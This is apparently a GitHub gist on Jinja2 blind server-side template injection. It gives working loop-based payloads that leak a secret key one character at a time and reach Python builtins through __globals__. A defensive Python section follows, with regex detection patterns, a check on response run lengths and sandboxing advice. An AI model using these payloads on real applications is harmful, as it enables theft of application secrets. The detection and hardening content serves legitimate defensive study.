@camas
Created January 19, 2021 19:07
Jinja2 blind SSTI tricks

Jinja2 blind SSTI extraction tricks

Only useful when:

  • SSTI is possible

  • Double brackets {{ are filtered

  • Alternate data extraction methods (reverse shell, etc.) are not possible

Rather than using boolean logic to extract data one bit at a time, we can extract entire integers by making use of for statements.

{% for i in range(value) %}1{% endfor %}

# Output: 11111111...

value can now be recovered by counting the number of 1's in the output.

This can be useful for extracting parts of strings:

{% for i in range(ord(secret_key[3])) %}1{% endfor %} # secret_key = "v3rY_s3Cr3t"

# Output: 111111... 89 total

c_3 = chr(value) # = chr(89) = 'Y'

If ord or other Python builtins aren't exposed to the template, we can reach them through the private attributes of an object that is exposed (here get_flashed_messages):

{% for i in range(get_flashed_messages.__globals__.__builtins__.ord(secret_key[4])) %}1{% endfor %}

# Output: 111111... 95 total

c_4 = chr(value) # = chr(95) = '_'

Loops can be combined to extract multiple integers at once, or whole strings, by giving each loop its own marker character:

{% for i in range(get_flashed_messages.__globals__.__builtins__.ord(secret_key[0])) %}0{% endfor %}
{% for i in range(get_flashed_messages.__globals__.__builtins__.ord(secret_key[1])) %}1{% endfor %}
{% for i in range(get_flashed_messages.__globals__.__builtins__.ord(secret_key[2])) %}2{% endfor %}

# Output: 000...111...222...

secret_key = chr(value_0) + chr(value_1) + chr(value_2) + ...
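From the defender's side, the pattern above is visible on both the request and the response. The following stdlib-only Python is an added example and not part of the gist: it flags user input containing a for/range loop (and the dunder traversal used to reach builtins), flags responses whose longest run of a single repeated character is 32 or more (every printable ASCII character has an ord() of at least 32, so a leaked character always produces such a run), and, for impact assessment after the fact, reverses the counting step to show what was exposed. The function names and the 32-character threshold are my own assumptions.

```python
"""Detection helpers for the Jinja2 for/range exfiltration pattern.

Added example, not the gist's code. Assumptions: `value` is a raw
user-supplied string, `body` is the part of the rendered response that
echoes user input; names and the threshold are my own choices."""
import re
from itertools import groupby
from typing import List

# A {% for ... in range( ... %} statement: the building block of the trick.
FOR_RANGE_RE = re.compile(r"{%-?\s*for\s+\w+\s+in\s+range\s*\(")
# Dunder attribute traversal, used to reach __builtins__ when ord() is hidden.
DUNDER_RE = re.compile(r"\.__\w+__")
# Expression delimiters, the case the gist assumes is already filtered.
EXPR_RE = re.compile(r"{{.*?}}", re.DOTALL)


def classify_input(value: str) -> List[str]:
    """Return the suspicious template constructs found in one user value."""
    findings = []
    if EXPR_RE.search(value):
        findings.append("jinja-expression")
    if FOR_RANGE_RE.search(value):
        findings.append("for-range-loop")
        if DUNDER_RE.search(value):
            findings.append("dunder-traversal")
    return findings


def longest_run(text: str) -> int:
    """Length of the longest run of one repeated character (0 for empty text)."""
    return max((sum(1 for _ in g) for _, g in groupby(text)), default=0)


def response_suspicious(body: str, threshold: int = 32) -> bool:
    """A loop leaking a printable ASCII char emits ord(c) >= 32 copies of its
    marker, so a run that long is worth alerting on. Legitimate pages can
    contain long runs too (divider lines, padding), so tune the threshold or
    restrict the check to endpoints that echo user input."""
    return longest_run(body) >= threshold


def recover_leaked_text(body: str) -> str:
    """Impact assessment: map each run of a repeated marker back to
    chr(run length), i.e. reverse the counting step the gist describes.
    Apply only to the echoed region, not a whole HTML page."""
    return "".join(chr(sum(1 for _ in g)) for _, g in groupby(body))
```

The primary fix is not to render user input as a template at all; where that is unavoidable, jinja2.sandbox.SandboxedEnvironment refuses attribute names that begin with an underscore, which stops the __globals__ traversal shown above.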